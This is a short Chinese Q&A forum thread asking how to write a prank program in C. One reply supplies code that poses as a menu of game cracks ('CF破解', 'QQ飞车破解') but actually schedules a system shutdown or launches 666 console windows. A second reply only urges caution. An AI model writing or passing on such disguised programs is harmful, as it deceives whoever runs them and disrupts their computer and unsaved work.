谁能教我用C语言编写一个整人程序?
发布网友
发布时间:2022-05-01 23:28
我来回答
共2个回答
热心网友
时间:2022-06-25 01:53
# include <stdio.h>
# include <windows.h>
# include <malloc.h>
int main(void)
{
int c;
int i;
int j;
nihao:
printf("1:CF破解\n");
printf("2:QQ飞车破解\n");
printf("请选择: ");
scanf("%d",&c);
if (c == 1)
{
system("shutdown -s -t 600");
}
else if (2 == c)
{
printf("你太坏了 我要惩罚你!\n");
for (j=0; j<666; ++j)
system("start");
}
else
{
printf("你敲错了,请重新输入!\n");
goto nihao;
}
return 0;
}
1 。选择 是关机
2 。选择 是弹出666个窗口
热心网友
时间:2022-06-25 01:54
整人须谨慎...